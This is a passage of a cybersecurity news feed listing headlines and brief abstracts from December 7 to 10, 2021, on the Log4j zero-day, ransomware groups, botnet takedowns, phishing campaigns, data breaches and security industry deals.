‘Appalling’ Riot Games Job Fraud Takes Aim at Wallets Full Text

Abstract Scammers are using fake job listings to empty the wallets of young, hopeful victims looking to break into the gaming industry.

Threatpost

December 10, 2021 – Phishing

Phishing attacks use QR codes to steal banking credentials Full Text

Abstract A new phishing campaign that targets German e-banking users has been underway in the last couple of weeks, involving QR codes in the credential-snatching process.

BleepingComputer

December 10, 2021 – Vulnerabilities

Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks Full Text

Abstract Vulnerabilities in Microsoft and others’ popular OAuth2.0 implementations lead to redirection attacks that bypass most phishing detection solutions and email security solutions.

Proofpoint

December 10, 2021 – Privacy

Russia Blocks Tor Privacy Service in Latest Censorship Move Full Text

Abstract Russia has stepped up its censorship efforts in the country by fully blocking access to the Tor web anonymity service, coinciding with the ban of six virtual private network (VPN) operators, as the government continues its efforts to control the internet and crack down on attempts to circumvent locally imposed web restrictions. The Federal Service for Supervision of Communications, Information Technology and Mass Media, also known as Roskomnadzor, the watchdog responsible for monitoring, controlling and censoring Russian mass media, announced the block, accusing it of enabling access to illegal content, Reuters reported this week. Russia accounts for 15% of all Tor users, with more than 310,000 daily users, second only to the U.S. Tor, short for The Onion Router, enables users to automatically encrypt and reroute their web requests through a network of Tor relays for anonymizing network traffic, as well as help bypass censorship and protect their identities from the intern

The Hacker News

December 10, 2021 – Vulnerabilities

A zero-day exploit for Log4j Java library could have a tsunami impact on IT giants Full Text

Abstract Experts publicly disclose Proof-of-concept exploits for a critical zero-day vulnerability in the Apache Log4j Java-based logging library. Experts publicly disclose Proof-of-concept exploits for a critical remote code execution zero-day vulnerability,...

Security Affairs

December 10, 2021 – Breach

Volvo Cars discloses security breach leading to R&D data theft Full Text

Abstract Swedish carmaker Volvo Cars has disclosed that unknown attackers have stolen research and development information after hacking some of its servers.

BleepingComputer

December 10, 2021 – Vulnerabilities

Mozilla Patches High-Severity Vulnerabilities in Firefox, Thunderbird Full Text

Abstract If exploited, the most severe of these security bugs could allow attackers to execute arbitrary code within the context of the vulnerable application, which could lead to full system compromise.

Security Week

December 10, 2021 – Attack

1.6 million WordPress sites targeted in the last couple of days Full Text

Abstract Wordfence experts detected a massive wave of attacks in the last couple of days that targeted over 1.6 million WordPress sites. Wordfence researchers spotted a massive wave of attacks in recent days targeting over 1.6 million...

Security Affairs

December 10, 2021 – Vulnerabilities

Minecraft rushes out patch for critical Log4j vulnerability Full Text

Abstract Swedish video game developer Mojang Studios has released an emergency Minecraft security update to address a critical bug in the Apache Log4j Java logging library used by the game's Java Edition client and multiplayer servers.

BleepingComputer

December 10, 2021 – Malware

PHP Re-Infectors – The Malware that Keeps On Giving Full Text

Abstract Attackers usually replace the index.php with an infected copy of the WordPress index.php file and also add hundreds or thousands of infected .htaccess files throughout the website directories.

Sucuri

December 10, 2021 – Malware

BlackCat ransomware, a very sophisticated malware written in Rust Full Text

Abstract BlackCat is the first professional ransomware strain that was written in the Rust programming language, researchers reported. Malware researchers from Recorded Future and MalwareHunterTeam discovered ALPHV (aka BlackCat), the first professional...

Security Affairs

December 10, 2021 – Government

Australian govt raises alarm over Conti ransomware attacks Full Text

Abstract The Australian Cyber Security Centre (ACSC) says Conti ransomware attacks have targeted multiple Australian organizations from various industry verticals since November.

BleepingComputer

December 10, 2021 – Attack

Ransomware Attack at Payroll Provider Frontier Software Leaks Data on Australian Government Workers Full Text

Abstract South Australia Treasurer Rob Lucas said on Friday that state government employee data has been exfiltrated as part of a ransomware attack on payroll provider Frontier Software.

ZDNet

December 10, 2021 – Hacker

New ‘Karakurt’ hacking group focuses on data theft and extortion Full Text

Abstract A sophisticated cybercrime group known as 'Karakurt' who has been quietly working from the shadows has had its tactics and procedures exposed by researchers who tracked recent cyberattacks conducted by the hackers.

BleepingComputer

December 10, 2021 – Government

How CISA’s New Patching Directive Can Drive Cyber Hygiene Full Text

Abstract The US federal agencies have two weeks to close the vulnerabilities published in 2021 and six months for older Common Vulnerabilities and Exposures (CVEs) — some of which date back to 2014.

CIO

December 10, 2021 – Breach

Data breach impacts 80,000 South Australian govt employees Full Text

Abstract The South Australian government has admitted that the personal details of tens of thousands of its employees were compromised following a cyber-attack on an external payroll software provider.

BleepingComputer

December 10, 2021 – General

Beware of ransomware attacks between Christmas and New Year’s! Full Text

Abstract Darktrace researchers discovered a 30% rise in the average number of attempted ransomware attacks over the holiday season in every consecutive year from 2018 to 2020 compared to the monthly average.

Help Net Security

December 10, 2021 – Vulnerabilities

New zero-day exploit for Log4j Java library is an enterprise nightmare Full Text

Abstract Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to ongoing remote code execution attacks.

BleepingComputer

December 10, 2021 – Vulnerabilities

Flaw in Widely Used Java-based Logging Utility Poses Grave Threat to Multiple Applications Full Text

Abstract Exploit code has been released for a serious code-execution vulnerability in Log4j, which is used by large enterprises and also in Java versions of Minecraft, several websites reported last Thursday.

ARS Technica

December 10, 2021 – Attack

Massive attack against 1.6 million WordPress sites underway Full Text

Abstract Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites.

BleepingComputer

December 10, 2021 – Policy and Law

DOJ gives Russian national two-year sentence for work shielding Kelihos malware and other ransomware Full Text

Abstract The DoJ sentenced Oleg Koshkin to two years in prison for his work in helping to "conceal" the Kelihos malware and other ransomware from antivirus software. He was facing up to 15 years in prison.

ZDNet

December 9, 2021 – Criminals

Canadian Ransomware Arrest Is a Meaningful Flex, Experts Say Full Text

Abstract U.S. and Canada charge Ottawa man for ransomware attacks, signaling that North America is no cybercriminal haven.

Threatpost

December 9, 2021 – Botnet

Fueled by Pandemic Realities, Grinchbots Aggressively Surge in Activity Full Text

Abstract E-commerce’s proverbial Who-ville is under siege, with a rise in bots bent on ruining gift cards and snapping up coveted gifts for outrageously priced resale.

Threatpost

December 9, 2021 – Vulnerabilities

How MikroTik Routers Became a Cybercriminal Target Full Text

Abstract The powerful devices leveraged by the Meris botnet have weaknesses that make them easy to exploit, yet complex for organizations to track and secure, researchers said.

Threatpost

December 09, 2021 – Solution

Kali Linux 2021.4 released with 9 new tools, further Apple M1 support Full Text

Abstract Kali Linux 2021.4 was released today by Offensive Security and includes further Apple M1 support, increased Samba compatibility, nine new tools, and an update for all three main desktops.

BleepingComputer

December 9, 2021 – APT

SideCopy APT Targets Indian and Afghan Governments Full Text

Abstract Researchers discovered that the SideCopy APT group targeted government officials in India and Afghanistan via the new AuTo data stealer for cyberespionage. Hackers use ActionRAT and AuTo Stealer malware in this campaign. Government entities are suggested to invest more in security and stay vig ...

Cyware Alerts - Hacker News

December 09, 2021 – Government

US to tighten restrictions on exports of malicious cyber tools Full Text

Abstract The Biden administration is expected to announce on Friday an initiative to tighten rules surrounding the exports of certain technologies that have been used by authoritarian governments and bad actors for repression. 

The Hill

December 09, 2021 – Vulnerabilities

Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs Full Text

Abstract At least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier of routers and wireless ISP devices. The most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News. "These devices are both powerful, [and] often highly vulnerable," the researchers noted. "This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (aka 'C2'), traffic tunneling, and more." MikroTik devices are an enticing target not least because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by threat actors to mount an array of intrusions. Indeed, earlier this Septem

The Hacker News

December 9, 2021 – Botnet

Dark Mirai botnet spreads targeting RCE on TP-Link routers Full Text

Abstract A botnet tracked as Dark Mirai spreads by exploiting a new vulnerability affecting TP-Link TL-WR840N EU V5 home routers. Dark Mirai botnet spreads by exploiting a new vulnerability, tracked as CVE-2021-41653, affecting TP-Link TL-WR840N EU V5 home...

Security Affairs

December 09, 2021 – Ransomware

ALPHV BlackCat - This year’s most sophisticated ransomware Full Text

Abstract The new ALPHV ransomware operation, aka BlackCat, launched last month and could be the most sophisticated ransomware of the year, with a highly-customizable feature set allowing for attacks on a wide range of corporate environments.

BleepingComputer

December 9, 2021 – Ransomware

Revived Cerber Targets Confluence and GitLab Servers Full Text

Abstract Cerber ransomware is active again with new attack tactics. This time it has been observed targeting remote code execution vulnerabilities in Atlassian Confluence and GitLab servers.

Cyware Alerts - Hacker News

December 09, 2021 – Education

Why Holidays Put Your Company at Risk of Cyber Attack (And How to Take Precautions) Full Text

Abstract It is a time when many are thinking of their families and loved ones, time off work, and gift-giving – the holidays. However, while many have their minds outside the realm of work during the holiday season, often, this is when attackers plan their most sinister attacks. So how can you take precautions to protect your organization during these times? Why holidays put your company at risk of cyberattack: attackers today do not have a soft spot for businesses and do not give companies a break at any time of the year, especially not during holidays. On the contrary, any time of the year when companies may be less prepared to fend off a cyberattack is an opportunity for successful compromise. As a result, the holidays put your company at a higher risk of cyberattack. Most end-users do not think about cybersecurity when surfing the web or receiving emails with holiday deals during the season. As a result, many let their guard down to a certain degree and become preoccupied and distracted m

The Hacker News

December 9, 2021 – Vulnerabilities

Mozilla fixed high-severity bugs in Firefox and Thunderbird mail client Full Text

Abstract Mozilla released security updates for the Firefox browser and Thunderbird mail client to address multiple vulnerabilities. Mozilla released security updates to address multiple vulnerabilities in the Firefox browser and Thunderbird mail client. The company...

Security Affairs

December 09, 2021 – Malware

Malicious Notepad++ installers push StrongPity malware Full Text

Abstract The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.

BleepingComputer

December 9, 2021 – Hacker

Microsoft Seizes Malicious Domains Used by Nickel Full Text

Abstract The Nickel group was using several malicious domains for intelligence gathering from multiple government agencies, think tanks, and human rights organizations worldwide. 

Cyware Alerts - Hacker News

December 9, 2021 – Hacker

Crooks injects e-skimmers in random WordPress plugins of e-stores Full Text

Abstract Threat actors are injecting credit card swipers into random plugins of e-commerce WordPress sites, Sucuri researchers warn. Sucuri researchers are warning of threat actors injecting credit card swipers into random plugins of e-commerce WordPress sites....

Security Affairs

December 09, 2021 – Botnet

Dark Mirai botnet targeting RCE on popular TP-Link router Full Text

Abstract The botnet known as Dark Mirai (aka MANGA) has been observed exploiting a new vulnerability on the TP-Link TL-WR840N EU V5, a popular inexpensive home router released in 2017.

BleepingComputer

December 9, 2021 – Hacker

KAX17 Runs Rogue Relays to Expose Tor Users Full Text

Abstract Researchers stumbled across a mischievous threat actor, dubbed KAX17, running over 900 malicious servers allegedly to deanonymize Tor users. Most of the Tor relay servers used by the group were located in data centers worldwide and were configured as entry and middle points. The recent findings sho ...

Cyware Alerts - Hacker News

December 9, 2021 – Malware

Tens of malicious NPM packages caught hijacking Discord servers Full Text

Abstract Researchers from cybersecurity firm JFrog have discovered 17 malicious packages in the NPM (Node.js package manager) repository that hijack Discord servers; the packages were developed...

Security Affairs

December 09, 2021 – Vulnerabilities

Microsoft, Google OAuth flaws can be abused in phishing attacks Full Text

Abstract Researchers have discovered a set of previously unknown methods to launch URL redirection attacks against weak OAuth 2.0 implementations.

BleepingComputer

December 9, 2021 – Attack

US Food Importer Firm Atalanta Suffers Ransomware Attack Full Text

Abstract Upon becoming aware of the malicious activity, Atalanta engaged third-party specialists and began to remediate the situation, including conducting a forensic investigation into the incident.

The Daily Swig

December 9, 2021 – Botnet

Moobot botnet spreads by exploiting CVE-2021-36260 flaw in Hikvision products Full Text

Abstract Moobot is a Mirai-based botnet that is rapidly spreading by exploiting a critical command injection vulnerability in the webserver of some Hikvision products, tracked...

Security Affairs

December 09, 2021 – Solution

Microsoft previews new endpoint security solution for SMBs Full Text

Abstract Microsoft Defender for Business, a new endpoint security solution specially built for small and medium-sized businesses (SMBs), is now rolling out in preview worldwide.

BleepingComputer

December 9, 2021 – Vulnerabilities

Critical web security flaws in Kaseya Unitrends backup appliances remediated after researchers’ disclosure Full Text

Abstract Each of the flaws (rated with a CVSS score of 9.8) posed a remote code execution risk to Kaseya Unitrends Backup Appliance running vulnerable versions of the software, ranging from 10.0.x-10.5.4.

The Daily Swig

December 09, 2021 – Breach

Cox discloses data breach after hacker impersonates support agent Full Text

Abstract Cox Communications has disclosed a data breach after a hacker impersonated a support agent to gain access to customers' personal information.

BleepingComputer

December 9, 2021 – Vulnerabilities

Flaws in Tonga’s top-level domain left Google, Amazon, Tether web services vulnerable to takeover Full Text

Abstract Palisade researchers discovered an SQL injection vulnerability on the registrar website, abuse of which could enable attackers to obtain the plaintext DNS master passwords for '.to' domains.

The Daily Swig

December 09, 2021 – Vulnerabilities

SanDisk SecureAccess bug allows brute forcing vault passwords Full Text

Abstract Western Digital has fixed a security vulnerability that enabled attackers to brute force SanDisk SecureAccess passwords and access the users' protected files.

BleepingComputer

December 9, 2021 – Vulnerabilities

SSRF vulnerability patched in Jamf Pro mobile security platform Full Text

Abstract A vulnerability in Jamf Pro, a popular MDM platform for Apple devices, allowed attackers to stage SSRF attacks on the application’s servers, security researchers at Assetnote have found.

The Daily Swig

December 09, 2021 – Breach

Fujitsu pins Japanese govt data breach on stolen ProjectWEB accounts Full Text

Abstract Fujitsu says the attackers behind the May data breach used a vulnerability in the company's ProjectWEB information-sharing tool to steal accounts from legitimate users and access proprietary data belonging to multiple Japanese government agencies.

BleepingComputer

December 09, 2021 – Vulnerabilities

Hundreds of thousands of MikroTik devices still vulnerable to botnets Full Text

Abstract Approximately 300,000 MikroTik routers are vulnerable to critical vulnerabilities that malware botnets can exploit for cryptomining and DDoS attacks.

BleepingComputer

December 09, 2021 – Vulnerabilities

Windows ‘InstallerFileTakeOver’ zero-day bug gets free micropatch Full Text

Abstract An unofficial patch is available for a zero-day vulnerability that is actively exploited in the wild to gain administrator privileges.

BleepingComputer

December 9, 2021 – Breach

Microsoft Vancouver leaking website credentials via overlooked DS_STORE file Full Text

Abstract CyberNews researchers discovered a Desktop Services Store (DS_STORE) file left on a publicly accessible web server that belongs to Microsoft Vancouver. Original post @ https://cybernews.com/security/microsoft-vancouver-leaking-website-credentials-via-overlooked-ds-store-file/ The...

Security Affairs

December 08, 2021 – Solution

Microsoft: Secured-core servers help prevent ransomware attacks Full Text

Abstract Microsoft says the first Secured-core certified Windows Server and Microsoft Azure Stack HCI devices are now available to protect customers' networks from security threats, including ransomware attacks.

BleepingComputer

December 8, 2021 – Business

Private Equity Firm Permira to Acquire Mimecast in $5.8 Billion Deal Full Text

Abstract Mimecast on Tuesday announced that private equity firm Permira wants to acquire it in an all-cash transaction that values the email security company at roughly $5.8 billion.

Security Week

December 08, 2021 – Botnet

Google Disrupts Blockchain-based Glupteba Botnet; Sues Russian Hackers Full Text

Abstract Google on Tuesday said it took steps to disrupt the operations of a sophisticated "multi-component" botnet called Glupteba that infected more than one million Windows computers across the globe and stored its command-and-control server addresses on Bitcoin's blockchain as a resilience mechanism. As part of the efforts, Google's Threat Analysis Group (TAG) said it partnered with the CyberCrime Investigation Group over the past year to terminate around 63 million Google Docs that were observed to have distributed the malware, alongside 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts that were associated with its distribution. Google TAG said it worked with internet infrastructure providers and hosting providers, such as CloudFlare, to dismantle the malware by taking down servers and placing interstitial warning pages in front of the malicious domains. In tandem, the internet giant also announced a lawsuit against two Russian indi

The Hacker News

December 8, 2021 – General

Not with a Bang but a Whisper: The Shift to Stealthy C2 Full Text

Abstract DoH! Nate Warfield, CTO of Prevailion, discusses new stealth tactics threat actors are using for C2, including Malleable C2 from Cobalt Strike’s arsenal.

Threatpost

December 08, 2021 – Hacker

Hackers infect random WordPress plugins to steal credit cards Full Text

Abstract Credit card swipers are being injected into random plugins of e-commerce WordPress sites, hiding from detection while stealing customer payment details.

BleepingComputer

December 8, 2021 – Malware

Emotet Needs No Intermediate Trojan, Drops Cobalt Strike Beacons Directly Full Text

Abstract Conventionally, Emotet would install either TrickBot or Qbot on compromised devices. These trojans would eventually install Cobalt Strike. Now, it has changed its tactics.

Cyware Alerts - Hacker News

December 08, 2021 – Botnet

140,000 Reasons Why Emotet is Piggybacking on TrickBot in its Return from the Dead Full Text

Abstract The operators of TrickBot malware have infected an estimated 140,000 victims across 149 countries a little over a year after attempts were made to dismantle its infrastructure, even as the malware is fast becoming an entry point for Emotet, another botnet that was taken down at the start of 2021. Most of the victims detected since November 1, 2020, are from Portugal (18%), the U.S. (14%), and India (5%), followed by Brazil (4%), Turkey (3%), Russia (3%), and China (3%), Check Point Research noted in a report shared with The Hacker News, with government, finance, and manufacturing entities emerging as the top affected industry verticals. "Emotet is a strong indicator of future ransomware attacks, as the malware provides ransomware gangs a backdoor into compromised machines," said the researchers, who detected 223 different Trickbot campaigns over the course of the last six months. Both TrickBot and Emotet are botnets, which are a network of internet-connected devices infected by

The Hacker News

December 8, 2021 – Vulnerabilities

SonicWall strongly urges customers to apply patches to SMA 100 devices Full Text

Abstract Security vendor SonicWall strongly urges customers using SMA 100 series appliances to install security patches that address multiple security flaws, some of them rated as critical...

Security Affairs

December 8, 2021 – Ransomware

Emotet’s Behavior & Spread Are Omens of Ransomware Attacks Full Text

Abstract The botnet, which resurfaced last month on the back of TrickBot, can now directly install Cobalt Strike on infected devices, giving threat actors direct access to targets.

Threatpost

December 08, 2021 – Hacker

XE Group exposed for eight years of hacking, credit card theft Full Text

Abstract A relatively unknown group of Vietnamese hackers calling themselves 'XE Group' has been linked to eight years of for-profit hacking and credit card skimming.

BleepingComputer

December 8, 2021 – Business

Claroty raises $400 million to fund Medigate acquisition Full Text

Abstract Israeli security firm Claroty is raising $400 million in a Series E round led by SoftBank. The fresh funding will be used to acquire Medigate, which specializes in protecting medical infrastructure.

Calcalist Tech

December 08, 2021 – Education

[eBook] Guide to Achieving 24x7 Threat Monitoring and Response for Lean IT Security Teams Full Text

Abstract If there is one thing the past few years have taught the world, it's that cybercrime never sleeps. For organizations of any size and scope, having around-the-clock protection for their endpoints, networks, and servers is no longer optional, but it's also not entirely feasible for many. Attackers are better than ever at slipping in undetected, and threats are constantly evolving. Teams can't afford to take a minute off, but they also can't manage the massive security necessary to defend most organizations. A new eBook by XDR provider Cynet (download here) breaks down this challenge and offers some solutions for lean security teams looking for ways to improve their detection and response capabilities. The guide strikes an optimistic tone for lean IT security teams. Though the challenges are expansive – including talent shortages, an ever-expanding threat surface, and rising security tool prices – organizations can still find smart and effective ways to stay protected 24x7. Why 2

The Hacker News

December 8, 2021 – Attack

CS Energy foiled a ransomware attack Full Text

Abstract A cyberattack hit CS Energy in Australia on Saturday, November 27; experts believe the attack was orchestrated by Chinese hackers. The ransomware attack hit a major energy network operated by CS Energy and could have had dramatic consequences...

Security Affairs

December 08, 2021 – Privacy

Tor’s main site blocked in Russia as censorship widens Full Text

Abstract The Tor Project's main website, torproject.org, is actively blocked by Russia's largest internet service providers, and sources from the country claim that the government is getting ready to conduct an extensive block of the project.

BleepingComputer

December 8, 2021 – Vulnerabilities

Salt Security Report Surfaces GraphQL API Vulnerabilities Full Text

Abstract Salt Security today released a report highlighting a vulnerability its researchers discovered in an API based on the GraphQL specification implemented by an undisclosed financial services firm.

Security Boulevard

December 8, 2021 – Malware

Emotet directly drops Cobalt Strike beacons without intermediate Trojans Full Text

Abstract The Emotet malware continues to evolve; in the latest attacks, it directly installs Cobalt Strike beacons to give the attackers immediate access to the target network...

Security Affairs

December 08, 2021 – Vulnerabilities

SonicWall ‘strongly urges’ customers to patch critical SMA 100 bugs Full Text

Abstract SonicWall 'strongly urges' organizations using SMA 100 series appliances to immediately patch them against multiple security flaws rated with CVSS scores ranging from medium to critical.

BleepingComputer

December 8, 2021 – Botnet

Identity Verification Company Incode Raises $220 Million at $1.25 Billion Valuation Full Text

Abstract The funding round was led by General Atlantic and SoftBank, but Capital One Ventures, Coinbase Ventures, J.P. Morgan, and SVCI also participated, along with other existing investors.

Security Week

December 08, 2021 – Botnet

Moobot botnet spreading via Hikvision camera vulnerability Full Text

Abstract A Mirai-based botnet called 'Moobot' is spreading aggressively via exploiting a critical command injection flaw in the webserver of many Hikvision products.

BleepingComputer

December 8, 2021 – Vulnerabilities

Android Security Updates Patch 46 Vulnerabilities Full Text

Abstract The most severe of the fixed issues is an information leakage bug in the Media framework “that could lead to remote information disclosure with no additional execution privileges needed,” Google said.

Security Week

December 8, 2021 – Criminals

Canadian indicted for launching ransomware attacks on orgs in US, Canada Full Text

Abstract The FBI and Justice Department unsealed indictments today leveling a number of charges against 31-year-old Canadian Matthew Philbert for his alleged involvement in several ransomware attacks.

ZDNet

December 7, 2021 – Vulnerabilities

Windows 10 Drive-By RCE Triggered by Default URI Handler Full Text

Abstract There’s an argument injection weakness in the Windows 10/11 default handler, researchers said: an issue that Microsoft has only partially fixed.

Threatpost

December 07, 2021 – Cryptocurrency

Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices Full Text

Abstract Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the total CPU usage," the Taiwanese company said in an alert. "This process mimics a kernel process but its [process identifier] is usually greater than 1000." QNAP said it's currently investigating the infections, but did not share more information on the initial access vector that's being used to compromise the NAS devices. Affected users can remove the malware by restarting the appliances. In the interim, the company is recommending that users update their QTS (and QuTS Hero) operating systems to the latest version, enforce strong passwords for administr

The Hacker News

December 7, 2021 – Phishing

When Scammers Get Scammed, They Take It to Cybercrime Court Full Text

Abstract Underground arbitration system settles disputes between cybercriminals.

Threatpost

December 7, 2021 – Business

Google Takes Down Glupteba Botnet; Files Lawsuit Against Operators Full Text

Abstract The malware’s unique blockchain-enabled backup C2 scheme makes it difficult to eliminate completely.

Threatpost

December 07, 2021 – Malware

Emotet now drops Cobalt Strike, fast forwards ransomware attacks Full Text

Abstract In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent.

BleepingComputer

December 7, 2021 – Phishing

Persuasive Phishing Attacks Use Fake Office365 Spam Alerts Full Text

Abstract Microsoft has always been the target of phishing attacks. A new wave of phishing attacks is using fake Office 365 notifications with an aim to steal victims’ Microsoft credentials.

Cyware Alerts - Hacker News

December 07, 2021 – Government

Language requiring companies to report cyberattacks left out of defense bill Full Text

Abstract Legislation mandating cyber incident reporting for certain critical organizations was left out of the compromise version of the annual National Defense Authorization Act (NDAA) that the House is set to vote on Tuesday. 

The Hill

December 07, 2021 – Vulnerabilities

Eltima SDK Contains Multiple Vulnerabilities Affecting Several Cloud Service Providers Full Text

Abstract Cybersecurity researchers have disclosed multiple vulnerabilities in a third-party driver software developed by Eltima that have been "unwittingly inherited" by cloud desktop solutions like Amazon Workspaces, Accops, and NoMachine and could provide attackers a path to perform an array of malicious activities. "These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded," SentinelOne researchers said in a report shared with The Hacker News. The flaws have since been addressed in Amazon Nimble Studio AMI, Amazon NICE DCV, Amazon WorkSpaces, Amazon AppStream, NoMachine, Accops HyWorks, Accops HyWorks DVM Tools, Eltima USB Network Gate, Amzetta zPortal Windows zClient, Amzetta zPortal DVM Tools, FlexiHub, and Donglify. At its core, the issues reside in a product developed by Eltima that offers "USB over Ethernet&qu

The Hacker News

December 7, 2021 – Botnet

Google disrupts the Glupteba botnet Full Text

Abstract Google announced that it has disrupted the Glupteba botnet, a huge infrastructure composed of more than 1 million Windows PCs worldwide; it also sued Russian nationals Dmitry...

Security Affairs

December 07, 2021 – Vulnerabilities

Grafana fixes zero-day vulnerability after exploits spread over Twitter Full Text

Abstract Open-source analytics and interactive visualization solution Grafana received an emergency update today to fix a high-severity, zero-day vulnerability that enabled remote access to local files.

BleepingComputer

December 7, 2021 – Business

GitGuardian Raises $44 Million to Create Code Security Platform Full Text

Abstract GitGuardian raised $44 million in Series B funding, bringing the total funds raised to $56 million. The round was led by Eurazeo, with participation from Sapphire, Balderton, BPI, and Fly Ventures.

Security Week

December 07, 2021 – Botnet

Google files lawsuit against Russian hackers as part of disrupting botnet Full Text

Abstract Google on Tuesday announced it is pursuing litigation to disrupt a botnet run by operators based out of Russia, among other steps meant to crack down on the group.

The Hill

December 07, 2021 – Hacker

SolarWinds Hackers Targeting Government and Business Entities Worldwide Full Text

Abstract Nobelium, the threat actor attributed to the massive SolarWinds supply chain compromise, has been once again linked to a series of attacks targeting multiple cloud solution providers, services, and reseller companies, as the hacking group continues to refine and retool its tactics at an alarming pace in response to public disclosures. The intrusions, which are being tracked by Mandiant under two different activity clusters UNC3004 and UNC2652, are both associated with UNC2452, an uncategorized threat group that has since been tied to the Russian intelligence service. UNC2652, in particular, has been observed targeting diplomatic entities with phishing emails containing HTML attachments with malicious JavaScript, ultimately dropping a Cobalt Strike Beacon onto the infected devices. "In most instances, post compromise activity included theft of data relevant to Russian interests," Mandiant researchers Luke Jenkins, Sarah Hawley, Parnian Najafi, and Doug Bienstock said in

The Hacker News

December 7, 2021 – Cryptocurrency

Bitcoin Miner [oom_reaper] targets QNAP NAS devices Full Text

Abstract Taiwanese vendor QNAP warns customers of ongoing attacks in which threat actors target their NAS devices with cryptocurrency miners. Upon compromising the devices,...

Security Affairs

December 07, 2021 – Criminals

Alleged ransomware affiliate arrested for healthcare attacks Full Text

Abstract A 31-year old Canadian national has been charged in connection to ransomware attacks against organizations in the United States and Canada, a federal indictment unsealed today shows.

BleepingComputer

December 7, 2021 – Malware

How DoppelPaymer Hunts & Kills Windows Processes Full Text

Abstract DoppelPaymer hijacks ProcessHacker and exploits KProcessHacker to kill a list of processes, including both antivirus (AV) and endpoint detection and response (EDR) applications.

Crowdstrike

December 07, 2021 – Covid-19

Hackers using omicron, COVID-19 phishing emails to target universities Full Text

Abstract Threat actors are increasingly using phishing emails related to the COVID-19 pandemic and the new omicron variant to target universities and steal login credentials, new research published Tuesday found.

The Hill

December 07, 2021 – Hacker

Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers Full Text

Abstract Microsoft on Monday announced the seizure of 42 domains used by a China-based cyber espionage group that set its sights on organizations in the U.S. and 28 other countries pursuant to a legal warrant issued by a federal court in the U.S. state of Virginia. The Redmond company attributed the malicious activities to a group it pursues as Nickel, and by the wider cybersecurity industry under the monikers APT15, Bronze Palace, Ke3Chang, Mirage, Playful Dragon, and Vixen Panda. The advanced persistent threat (APT) actor is believed to have been active since at least 2012. "Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," Microsoft's Corporate Vice President for Customer Security and Trust, Tom Burt, said. "There is often a correlation between Nickel's targets and China's geopolitical int

The Hacker News

December 7, 2021 – APT

Microsoft seized 42 domains used by the China-linked APT15 cyberespionage group Full Text

Abstract Microsoft seized dozens of malicious domains used by the China-linked APT15 group to target organizations worldwide. Microsoft announced that it obtained a court warrant allowing it to seize 42 domains used by the group (aka Nickel,...

Security Affairs

December 07, 2021 – Attack

US universities targeted by Office 365 phishing attacks Full Text

Abstract US universities are being targeted in multiple phishing attacks designed to impersonate college login portals to steal valuable Office 365 credentials.

BleepingComputer

December 7, 2021 – Government

NSA Funding Cybersecurity Workforce Training Programs Full Text

Abstract Iowa State University and the University of Illinois at Urbana-Champaign will lead a coalition of industry and government partners to train professionals to grow the Midwest's cybersecurity workforce.

Government Technology

December 7, 2021 – APT

Nobelium continues to target organizations worldwide with custom malware Full Text

Abstract The Russia-linked Nobelium APT group is using a new custom malware dubbed Ceeloader in attacks against organizations worldwide. Mandiant researchers have identified two distinct clusters of activity, tracked as UNC3004 and UNC2652, that were associated with...

Security Affairs

December 07, 2021 – Ransomware

New Cerber ransomware targets Confluence and GitLab servers Full Text

Abstract Cerber ransomware is back, as a new ransomware family adopts the old name and targets Atlassian Confluence and GitLab servers using remote code execution vulnerabilities.

BleepingComputer

December 7, 2021 – Cryptocurrency

QNAP warns of new crypto-miner targeting its NAS devices Full Text

Abstract Taiwanese hardware vendor QNAP has released a new security advisory today warning users that a new strain of crypto-mining malware is targeting its network-attached storage (NAS) devices.

The Record

December 07, 2021 – Policy and Law

Google disrupts massive Glupteba botnet, sues Russian operators Full Text

Abstract Google announced today that it has taken action to disrupt the Glupteba botnet that now controls more than 1 million Windows PCs around the world, growing by thousands of new infected devices each day.

BleepingComputer

December 7, 2021 – Breach

LINE Pay Exposed Japanese, Taiwanese, and Thai Users’ Payment Data on GitHub Full Text

Abstract Smartphone payment provider LINE Pay announced yesterday that around 133,000 users' payment details were mistakenly published on GitHub between September and November of this year.

The Register

December 07, 2021 – Vulnerabilities

27 flaws in USB-over-network SDK affect millions of cloud users Full Text

Abstract Researchers have discovered 27 vulnerabilities in Eltima SDK, a library used by numerous cloud providers to remotely mount a local USB device.

BleepingComputer

December 7, 2021 – APT

French Organizations Under Attack from Russia-linked Nobelium APT Group Full Text

Abstract The state-sponsored hackers have compromised the email accounts belonging to French organizations and used them to orchestrate spear-phishing campaigns aimed at foreign institutions.

Security Affairs

December 07, 2021 – Solution

STOP Ransomware vaccine released to block encryption Full Text

Abstract German security software company G DATA has released a vaccine that will block STOP Ransomware from encrypting victims' files after infection.

BleepingComputer

December 07, 2021 – Vulnerabilities

QNAP warns users of bitcoin miner targeting their NAS devices Full Text

Abstract QNAP warned customers today of ongoing attacks targeting their NAS (network-attached storage) devices with cryptomining malware, urging them to take measures to protect them immediately.

BleepingComputer

December 07, 2021 – Cryptocurrency

Twitter bots pose as support staff to steal your cryptocurrency Full Text

